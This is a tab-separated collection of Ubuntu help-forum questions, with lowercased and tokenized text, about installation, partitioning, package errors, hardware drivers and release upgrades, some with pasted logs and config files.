346512	installing windows xp with ubuntu 12.04 already installed	thank you for paying attention and replying to my requests . i am in need of having to use windows xp , and i was wondering which methods could you provide me in order to sucessfully install windows xp on my hdd which already has ubuntu 12.04 . reading here and there , i 've come up with a plan : first , i 'll resize my partitions using gparted : partition 1 - 199 mb ext4 partition 2 - 2 gb swap partition 3 - 78 gb ext 4 i 'll resize those on the image to , maybe : first partition : will be increased to 6 gb . second partition : swap will stay the same . third partition : will be first reduced to ~30 gb , and then moved all the way to the right . a new partition will be made with the space in between swap and the 30 gb partition , intended for windows xp use , and maybe a few media files shared with ubuntu 12.04 . after that , the first partition will become the target of my windows xp installation . i 'll also choose the free space for a partition so that the windows setup formats it and i can be sure windows xp will be able to use it . that 's basically what i 've thought up . all that would be left for me to do should be booting the ubuntu 12.04 live cd and running boot-repair . now , may i ask you , is there a fail behind my plan ? are there better ways ? any recommendation or comments ?
346514	is steam for linux an open-source application ? does it deserve to be on linux ?	i 've noticed most linux apps and games are free , whereas , steam is causing linux games and apps to become more and more non-free . do you think that steam really deserves to be allowed on our software respositories ? even though steam is causing a major uprise in the amount of linux users , does it really follow the linux idea that the apps and games on linux are meant to be open-source ? free as in freedom , open as in open to editing and customization .
346518	when using mv command what is ./	thanks to whoever answer . i 'm trying to install voipmonitor on ubuntu12.04..lts . here is the previous command : wget `` http : //www.voipmonitor.org/download-gui ? version=latest & major=5 & festry '' -o w.tar.gz tar xzf w.tar.gz -what is -o w.tar.gz doing ? then , the next command is : mv voipmonitor-gui*/* ./ here is where i 'm stuck . this command is moving the previous downloaded file and unpacking it to where ? what is ./ ? thanks
346520	why ca n't i restart cron daemon in 12.04 lts ?	i just changed the timezone on my server and therefore need to restart crond so that it will pickup the change , but when i try , this is what happens : root @ s2 : / # service cron restart stop : unknown job : cron start : unknown job : cron or root @ s2 : / # /etc/init.d/cron restart rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service cron restart initctl : unknown job : cron since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop cron ; start cron . the restart ( 8 ) utility is also available . the process list says : root @ s2 : / # ps aux | grep cron root 10051 0.0 0.1 21992 732 ? ss 11:09 0:00 cron what am i doing wrong please ?
346522	problem installing opencpn	i downloaded opencpn . when i install it , it says : can not install libgl1-mesa-glx please help .
346524	how to install guest additions virtual box in 13.04	when i tried installing guest additions im getting the below error sudo apt-get install virtualbox-guest-additons-iso [ sudo ] password for gan : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package virtualbox-guest-additons-iso
346528	easiest way to set up an imap mail server	i am new to setting up a mail server , and everywhere i look i get either outdated or really complex instructions on setting up a mail server . is there any simple methods on installing an imap mail server ?
346529	ubuntu keeps disconnecting from wifi	it stays on the wifi anywhere from 2 hours and doe not disconnect once , or it can keep disconnecting and reconnecting again every 10 seconds . what could be the problem ? i 'm running 12.04lts , should i upgrade ? did the os not install properly ? or could this be a hardware problem , even though it connects and stays just fine in windows 8 ? by the way im quite new to ubuntu . much thanks !
346530	error while installing ubuntu 12.04	while installing ubuntu 12.04 , there is a process called expanding . 60 % of this process was completed but then the progress stopped . why does this happen , abd how long will it take to complete ? please advise me on this .
346531	lubuntu - xfce4-power-manager alternative	can i uninstall xfce4-power-manager and set my suspend settings somewhere else ? how would i be able to check my battery status ? i would like to get rid of xfce4-power-manager because of my problems with suspend/resume on nokia booklet 3g . further description and another question here : link i have xfce4-notifyd installed . thanks in advance for any suggestions .
346539	install times new roman in ubuntu 12.10	i was trying to install times new roman font using the commands sudo apt-get install msttcorefonts sudo apt-get install ttf-mscorefonts-installer now while implementing the first command , an agreement window appears with an < ok > at the bottom of the window which i am supposed to press . but unfortunately the < ok > has no links and it can not be pressed or accepted hitting enter . what to do ?
346542	how to get mythtv to use tmdb version 3 api	as of today , tmdb dropped support for their version 2.1 api , which is where ( mythvideo , at least ) is grabbing their data . how do we set the ubuntu version of mythtv ( 0.25 ) up to use the version 3 api , which is still supported ? i tried replacing tmdb.py with tmdb3.py , and this seems to have helped some , but it seems to crash when more than one possible match is encountered . also , i 'm not sure if something needs to be done for tvdb searches as well , as i do n't currently have any mythvideo tv shows that are missing metadata . any help that could be provided would be greatly appreciated .
346543	can i use a logitech c170 webcam on ubuntu 13.04 ?	does it need additional drivers ? my computer does have a microphone , so i can always use that one . i just want to be sure before i buy it . thanks in advance !
346544	what is the nginx equivalent command apache has for a2enmod ?	i 'm following this guide : how to setup owncloud server 5 with ssl connection problem though is that the guide is for apache but i am using nginx for my server . as such i am trying to `` reverse engineer '' the instructions to use them for nginx . the step i am having most problems with is : a2enmod rewrite & & a2enmod headers & & a2enmod ssl what is the a2enmod apache command equivalent for nginx ?
346545	how to detect which init script starts zram ?	due to a zram bug leading to machine lock-ups , i 've had to disable zram . i thought dpkg -- purge zram-config as well as commenting any reference out of /etc/rc.local would do the trick , but the module ( and its ominous dmesg warnings buffer i/o error on device zram0 , logical block 257912 ) keeps getting loaded . i 've grepped /etc/init and /etc/init.d for zram and there were no matches . i 've even redefined mkswap to log how it was called ( because the `` buffer errors '' occur when mkswap touches protected memory ) -- amazingly i did n't get any calls . so i ca n't figure out what configures zram ( calling mkswap + swapon ) . i 've taken to breaking the zram.ko to stop its loading . but i would still like to figure out what specific init script loads it . any ideas ? note that i 'm looking for answers about how to track down which init or startup script configures zram -- i know very well that the bug might already be fixed , that you can disable zram in several ways etc , and such answers would be off-topic .
346549	get display as byte from the ubuntu 12.04	i have ubuntu 12.04 lts . which file do i need to access to get the screen display in terms of bytes so that i can manipulate and store it as a video file . i want to access it via c and possibly python . i got no clue of where it might be and how to access it . any links , intro or anything would help a lot . thanks .
346550	ubuntu 13.04 problem : ( : (	respect to all : ) i am here new to ubuntu and just installed the fresh copy of ubuntu 13.04 , 64-bit version on my dell inspiron n5110 ( core i7 with 4gb memory ) laptop along with windows 7 on a different partition but with huge problems on it and could n't solve on my own . problems : laptop fan speeds up and produces extra heat even if the laptop is in idle state . webcam totally does not work . mousepad works partially ( touchpad hard but button fine ) . battery life is too short compared to windows . please help me . as i am new with linux , technical support in more elaboration will be more fruitful . thank you .
346551	i cant copy a file in the var/www directory	i am a noob with ubuntu and that 's why i ask dumb questions : d so my question is this : i installed mediawiki on a lubuntu virtual machine which is running on virtualbox . i configured and installed the mediawiki and now i need to copy the localsettings.php file in the var/www directory . i do this by using the terminal this is my code/scrypt : wiki @ wiki-virtual : ~ $ sudo cp localsettings.php /var/www cp : can not stat ‘localsettings.php’ : no such file or directory i also tried to write the full path to the file but i get : wiki @ wiki-virtual : ~ $ sudo cp /home/wiki/desktop/localsettings.php /var/www cp : can not stat ‘/home/wiki/desktop/localsettings.php’ : no such file or directory can you help me to do the final step in installing the mediawiki . also i can use some tips on working with the wiki on lubuntu .
346552	closest alternative to times new roman	what is the closest alternative font of times new roman in ubuntu 12.10 ? is it serif or sans serif or something else ? i have installed msttcorefonts already . now in my latex document i am preferring not to use times new roman as i found after a little browsing that there may be issues when compiling with pdflatex . i am preferring to stick to pdflatex , at least at this moment . this is the reason for asking the closest alternative .
346562	how to create ntfs partition in ubuntu 13.04	i 'm am new to this ubuntu but wan na use it . i got a hp laptop with 1tb hard disk in it with windows 7 as default os i had erased my windows and installed ubuntu 13.04 fresh . so can any one help me how to create ntfs partition so i can store my files , movies etc in it please .
346563	installing ubuntu on an hp pavilion dv6	i have a hp pavilion dv6 laptop ( dv6-6b55er ) . can i install the latest ubuntu ( 13.04 ) without having any problems such as missing drivers , performance.. etc . any advise is highly appreciated . thank you in advance .
346568	audio and brightness issues	my audio is always disabled and brightness is always set to default maximum at start-up . is there any way to overcome this situation ?
346571	sh61r4 shuttle with i5-3570k dual-link dvi problem	i 've just built a new machine and plugged in a 1920 x 1200 ( dell ) and 2560 x 1440 ( hazro hz27wc ) . however i ca n't get the hazro panel to work . i 've tried both the dvi ports . the first dvi port shows corruption during boot ( i suspect because it 's not a dual-link dvi port ) and the second shows nothing at all . the dell monitor works on both . if i go into `` displays '' and enable the hazro monitor then i get the following error : the selected configuration for displays could not be applied could not assign crtcs to outputs : trying modes for crtc 63 crtc 63 : trying mode 1920x1200 @ 60hz with output at 1920x1200 @ 60hz ( pass 0 ) none of the selected modes were compatible with the possible modes : trying modes for crtc 63 trying modes for crtc 64 trying modes for crtc 65 ... and a bunch more of pretty much the same with some searching i 'm pretty confident the sh61r4 supports dual-link dvi on one of the ports . the cable/screen were in use on my previous setup with no issues at all . i 've also used the intel driver update to ensure my drivers are as up to date as possible . any ideas ?
346576	mount specific ftp folder in ubuntu	i want to mount a specific folder in ubuntu . by default the folder that is set by the ftp server is the user 's home folder . however , if i mount ftp : //server.com/my_folder it will mount the `` my_folder '' folder . after i add the bookmark however , it looks like ubuntu forgets about my folder and stores only ftp : //server.com as after reboot when i open the bookmark i am taken directly to my ftp user 's home folder . any hints ?
346577	resizing file system	i installed ubutu 12.04 lts on my laptop with wubi . when i was installing ubutu , in installer , in the field `` installation size '' i choosed 7 gb . now i want to resize `` file system '' which has 7 gb . i want it to have more gb . what should i do ? i found ubuntu awesome and now 7 gb is not enough . http : //assets.ubuntu.com/sites/ubuntu/558/u/img/download/windows-installer-4-12.10.png sorry for my grammar mistakes : )
346582	my bluetooth is not working	i used to have my bluetooth working perfectly in windows on my toshiba satellite l650 . i formatted my harddrive and installed ubuntu 13.04 . now when i try to connect to my bluetooth , it says `` no bluetooth adapters found . '' how can i fix this ?
346584	format flashdrive ( mac )	i followed the instructions to create a bootable usb on mac , but it did n't work , it said `` can not read the flash drive '' . it was formatted as mac os extented , in the tutorial , you do n't say what format it should be . how should i format the usb before doing the tutorial again ?
346587	how can i change the terminal line colors by commands ?	i want to change my gnome-terminal lines color by using commands . i know how change it by going to profile and clicking profiles '' - `` profile preferences '' - `` color '' - `` background color '' , but i want to use commands .
346589	problems upgrading from 11.10 to 12.04	i am trying to do a long overdue upgrade of a ubuntu server from 11.10 ( through do-release-upgrade ) . the 11.10 is updated . version , architecture and kernel : $ lsb_release -a distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric $ uname -r 2.6.38-8-virtual $ dpkg -- print-architecture amd64 i 'm getting the following output when running do-release-upgrade . checking package manager reading package lists ... done a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/update-manager-snk0hu/precise '' , line 7 , in < module > sys.exit ( main ( ) ) file `` /tmp/update-manager-snk0hu/distupgrademain.py '' , line 226 , in main if app.run ( ) : file `` /tmp/update-manager-snk0hu/distupgradecontroller.py '' , line 1721 , in run return self.fullupgrade ( ) file `` /tmp/update-manager-snk0hu/distupgradecontroller.py '' , line 1639 , in lupgrade self.opencache ( ) file `` /tmp/update-manager-snk0hu/distupgradecontroller.py '' , line 192 , in opencache lock ) file `` /tmp/update-manager-snk0hu/distupgradecache.py '' , line 92 , in __init__ apt.cache.__init__ ( self , progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 93 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 136 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : the value 'oneiric ' is invalid for apt : :default-release as such a release is not available in the sources this is my /etc/apt/sources.list , maybe something wrong with that one ? # # deb cdrom : [ ubuntu-server 10.04 lts _lucid lynx_ - release amd64 ( 20100427 ) ] / lucid main restricted # deb cdrom : [ ubuntu-server 10.04 lts _lucid lynx_ - release amd64 ( 20100427 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //old-releases.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //old-releases.ubuntu.com/ubuntu/ oneiric universe deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric universe deb http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //old-releases.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric multiverse deb http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //old-releases.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //old-releases.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb http : //archive.canonical.com/ oneiric partner deb http : //pkg.jenkins-ci.org/debian binary/ deb http : //old-releases.ubuntu.com/ubuntu natty main restricted universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu natty main restricted universe multiverse 01ubuntu in /etc/apt/apt.conf.d/ has this text : apt : :default-release `` oneiric '' ; 10periodic in same location has : apt : :periodic : :update-package-lists `` 1 '' ; apt : :periodic : :download-upgradeable-packages `` 0 '' ; apt : :periodic : :autocleaninterval `` 0 '' ; this is the apt.log file : log time : 2011-10-16 20:32:42.241760 log time : 2011-10-16 20:32:50.327655 log time : 2011-10-16 20:33:06.970803 installing libssl1.0.0 as depends of openssh-server installing gcc-4.6-base as depends of libstdc++6 installing libtinfo5 as depends of libncurses5 installing libdb5.1 as depends of iproute installing libgcj12 as depends of libgcj-bc installing gcj-4.6-base as depends of libgcj12 installing libgmp10 as depends of libgcj12 installing gcj-4.6-jre-lib as recommends of libgcj12 installing libapt-pkg4.11 as depends of aptitude installing libboost-iostreams1.46.1 as depends of aptitude installing accountsservice as depends of language-selector-common installing libpolkit-gobject-1-0 as depends of accountsservice installing libaccountsservice0 as depends of accountsservice installing libapt-inst1.3 as depends of python-apt installing libffi6 as depends of libgirepository-1.0-1 new important dependency : libswitch-perl installing libswitch-perl as recommends of perl-modules new important dependency : libpod-plainer-perl installing libpod-plainer-perl as recommends of perl-modules new important dependency : libclass-isa-perl installing libclass-isa-perl as recommends of perl-modules installing grub2-common as depends of grub-pc installing grub-pc-bin as depends of grub-pc installing linux-image-3.0.0-12-virtual as depends of linux-image-virtual setting not as auto-installed ( direct depends of pkg in apt : :never-markauto-sections ) installing libjsr305-java as depends of libgoogle-collections-java installing libpciaccess0 as depends of libdrm-intel1 installing python-gobject-2 as depends of python-gobject installing libusb-1.0-0 as depends of usbutils installing librhino-java as depends of rhino installing libmount1 as predepends of mount installing libasyncns0 as depends of libpulse0 installing libjson0 as depends of libpulse0 installing xorg-sgml-doctools as depends of libx11-dev installing librtmp0 as depends of libcurl3-gnutls installing libencode-locale-perl as depends of libwww-perl installing libfile-listing-perl as depends of libwww-perl installing libhttp-date-perl as depends of libfile-listing-perl installing libhttp-cookies-perl as depends of libwww-perl installing libhttp-message-perl as depends of libhttp-cookies-perl installing liblwp-mediatypes-perl as depends of libhttp-message-perl installing libhttp-negotiate-perl as depends of libwww-perl installing liblwp-protocol-https-perl as depends of libwww-perl installing libnet-http-perl as depends of liblwp-protocol-https-perl installing libio-socket-ssl-perl as recommends of libnet-http-perl installing libnet-ssleay-perl as depends of libio-socket-ssl-perl installing libwww-robotrules-perl as depends of libwww-perl new important dependency : libhtml-form-perl installing libhtml-form-perl as recommends of libwww-perl new important dependency : libhttp-daemon-perl installing libhttp-daemon-perl as recommends of libwww-perl starting starting 2 investigating ( 0 ) console-setup [ amd64 ] < 1.57ubuntu20 - > 1.57ubuntu27 > ( utils ) broken console-setup : amd64 conflicts on console-terminus [ amd64 ] < 4.30-2 > ( fonts ) considering console-terminus : amd64 -1 as a solution to console-setup : amd64 17 added console-terminus : amd64 to the remove list fixing console-setup : amd64 via remove of console-terminus : amd64 done log time : 2011-10-16 20:27:59.832015 starting starting 2 investigating ( 0 ) libgtk2.0-0 [ amd64 ] < 2.24.6-0ubuntu5 > ( libs ) broken libgtk2.0-0 : amd64 depends on libatk1.0-0 [ amd64 ] < 2.2.0-0ubuntu1 > ( libs ) ( > = 1.12.4 ) considering libatk1.0-0 : amd64 10001 as a solution to libgtk2.0-0 : amd64 5 removing libgtk2.0-0 : amd64 rather than change libatk1.0-0 : amd64 investigating ( 0 ) libgtk2.0-bin [ amd64 ] < 2.24.6-0ubuntu5 > ( misc ) broken libgtk2.0-bin : amd64 depends on libgtk2.0-0 [ amd64 ] < 2.24.6-0ubuntu5 > ( libs ) ( > = 2.24.6-0ubuntu5 ) considering libgtk2.0-0 : amd64 5 as a solution to libgtk2.0-bin : amd64 3 removing libgtk2.0-bin : amd64 rather than change libgtk2.0-0 : amd64 done starting starting 2 investigating ( 0 ) x-ttcidfont-conf [ amd64 ] < 32+nmu2 > ( x11 ) broken x-ttcidfont-conf : amd64 depends on defoma [ amd64 ] < 0.11.12ubuntu1 > ( admin ) ( > = 0.5.0 ) considering defoma : amd64 10001 as a solution to x-ttcidfont-conf : amd64 1 removing x-ttcidfont-conf : amd64 rather than change defoma : amd64 done starting starting 2 investigating ( 0 ) libgcj11 [ amd64 ] < 4.5.3-9ubuntu1 > ( universe/libs ) broken libgcj11 : amd64 depends on gcj-4.5-base [ amd64 ] < 4.5.3-9ubuntu1 > ( universe/libs ) ( > = 4.5.3-9ubuntu1 ) considering gcj-4.5-base : amd64 10002 as a solution to libgcj11 : amd64 2 removing libgcj11 : amd64 rather than change gcj-4.5-base : amd64 investigating ( 0 ) gcj-4.5-jre-lib [ amd64 ] < 4.5.3-9ubuntu1 > ( universe/java ) broken gcj-4.5-jre-lib : amd64 depends on gcj-4.5-base [ amd64 ] < 4.5.3-9ubuntu1 > ( universe/libs ) ( > = 4.5.3-2~ ) considering gcj-4.5-base : amd64 10002 as a solution to gcj-4.5-jre-lib : amd64 2 removing gcj-4.5-jre-lib : amd64 rather than change gcj-4.5-base : amd64 done starting starting 2 investigating ( 0 ) libthai0 [ amd64 ] < 0.1.15-2 > ( libs ) broken libthai0 : amd64 depends on libthai-data [ amd64 ] < 0.1.15-2 > ( libs ) ( > = 0.1.10 ) considering libthai-data : amd64 10001 as a solution to libthai0 : amd64 1 removing libthai0 : amd64 rather than change libthai-data : amd64 investigating ( 0 ) libpango1.0-0 [ amd64 ] < 1.29.3+git20110916-0ubuntu1 > ( libs ) broken libpango1.0-0 : amd64 depends on libthai0 [ amd64 ] < 0.1.15-2 > ( libs ) ( > = 0.1.12 ) considering libthai0 : amd64 1 as a solution to libpango1.0-0 : amd64 0 removing libpango1.0-0 : amd64 rather than change libthai0 : amd64 done starting starting 2 investigating ( 0 ) libgdk-pixbuf2.0-0 [ amd64 ] < 2.24.0-1ubuntu1 > ( libs ) broken libgdk-pixbuf2.0-0 : amd64 depends on libtiff4 [ amd64 ] < 3.9.5-1ubuntu1 > ( libs ) considering libtiff4 : amd64 10001 as a solution to libgdk-pixbuf2.0-0 : amd64 0 removing libgdk-pixbuf2.0-0 : amd64 rather than change libtiff4 : amd64 done starting starting 2 investigating ( 0 ) groovy [ amd64 ] < 1.7.10-2 > ( universe/devel ) broken groovy : amd64 depends on libjansi-java [ amd64 ] < 1.4-3 > ( universe/java ) considering libjansi-java : amd64 10001 as a solution to groovy : amd64 0 removing groovy : amd64 rather than change libjansi-java : amd64 done starting starting 2 investigating ( 0 ) libxcursor1 [ amd64 ] < 1:1.1.12-1 > ( libs ) broken libxcursor1 : amd64 depends on libxfixes3 [ amd64 ] < 1:5.0-4 > ( libs ) considering libxfixes3 : amd64 10001 as a solution to libxcursor1 : amd64 0 removing libxcursor1 : amd64 rather than change libxfixes3 : amd64 done due to size , the main log file is at http : //pastebin.com/z6muqggn any suggestions on what this could be or how to solve it ?
346592	why are old distributions not partially supported indeffinetely if this is very inexpensive ?	i have an old computer , which runs ubutu 10.04 lts . there were numerous problems with drivers when trying 12.04 , so i rolled back to 10.04 , and am scared now to try something new as not to ruin the whole system . besides , i dislike the whole unity thing . the computer is not usually connected to the itnernet , so security patches are not a big issue . what is bugging me , however , is that software in the repositories is ancient . and while backporting security patches to the kernel might be cumbersome , setting up a build server for the newest version of most programs should be straightforward and cost no more than $ 1000 ( mostly for hdd-s ) in hardware , one time . why is recent software not available for ubuntu 10.04 ? are there non-standard repositories , taht do this ?
346595	which file is called or event is fired when we plug-in / plug-out power supply to the laptop ?	everytime i plug-in or plug-out powersupply the cpu frequency is changed to 'powersave ' which results in reduced efficiency . i need to be on 'performance ' all the time . i 've made a small java utility which i use to turn my cpus on performance . but this is kind of a too-much-repetitive process as i 've to run the java utility every two hours , whenever i plug-in or plug-out powersupply . any idea where i can place the commands like this : - cpufreq-selector -c 0 -g performance cpufreq-selector -c 1 -g performance so that everytime i plug-in or plug-out powersupply then the cpus are set to performance automatically . i 've jupiter installed so i believe that might be the culprit . uninstalling jupiter is one thing that i have n't tried , however , i 'm really interested in knowing what 's the standard way of doing this .
346597	swap partitioned drive not able to access	i am new to ubuntu however i installed it on drive ( d ) as my other partition ( c ) has windows installed . i had selected a partition ( f ) for swap area while installing . now i have un-installed ubuntu from ( d ) , but windows is unable to see or access the swap area that is ( f ) . it does not displaying ( f ) in 'my computer ' . how do i get that partition ( f ) back , as it has got some information on it that i need . i also read in a forum to use 'manage ' option and then delete the partition , but , i am unable to do that , as i have got info in that partition ( f ) . is it possible to remove swap area without losing any info in that partition ?
346600	jenkins-common package for latest jenkins builds	i am required to upgrade jenkins due to a bug breaking our builds , i 've used the jenkins repository from http : //pkg.jenkins-ci.org/debian/ and have come up against a wall . required jenkins version is 1.531 the jenkins-common package is required for some configuration and plugin files to be found by the jenkins package , though there is no jenkins-common version newer than 1.424.6 available . am i missing something ? where can i find a correctly-versioned jenkins-common ?
346602	13.04 no context menu after rabbitvcs install	i was using rabbit in 12.04 lts and then upgraded to 13.04 while rabbit menu was gone . so i went to the install page and followed the instructions : sudo add-apt-repository ppa : rabbitvcs/ppa sudo apt-get update sudo apt-get install rabbitvcs-nautilus3 restart computer , no context menu . so i continued : sudo apt-get install rabbitvcs-gedit sudo apt-get install rabbitvcs-cli log out log in open nautilus , right click on random folder but still no `` rabbit vcs '' in the context menu . i am certainly doing something incorrectly . but can not figure out what ... edit nautilus version is 3.6.3 and it si basically the default which comes with ubuntu 13.04 - in ubuntu it is called as `` files '' contents of .config/rabbitvcs/rabbitvcs.log : 2013-06-18 10:02:45,462 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,047 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/sv2013-06-18 10:02:45,462 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,047 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,047 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,437 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,437 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . n/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,047 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/xmlchanger ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,437 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . 2013-06-19 09:56:19,437 error rabbitvcs.vcs.svn the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/rabbitvcs/vcs/svn/__init__.py '' , line 254 , in statuses update=update ) clienterror : the path '/home/janipav/workspace/massfilesender ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . contents of /usr/share/rabbitvcs/configspec.ini [ general ] language = string ( default= '' english '' ) enable_attributes = boolean ( default=true ) enable_emblems = boolean ( default=true ) enable_recursive = boolean ( default=true ) show_debug = boolean ( default=false ) show_unversioned_files = boolean ( default=true ) [ external ] diff_tool = string ( default= '' /usr/bin/meld '' ) diff_tool_swap = boolean ( default=false ) [ cache ] number_repositories = integer ( default=30 ) number_messages = integer ( default=30 ) [ logging ] type = option ( `` none '' , `` file '' , `` console '' , `` both '' , default= '' both '' ) level = option ( `` debug '' , `` warning '' , `` info '' , `` error '' , `` critical '' , default= '' error '' )
346606	how can i install qtstalker ?	i wanted to install qtstalker , a stock market app on my ubuntu 13.04. qtsalker is not available in the ubuntu software center and sudo-apt-get install qtsalker gives the error : unable to locate package qtsalker . how can i install qtstalker in ubuntu ?
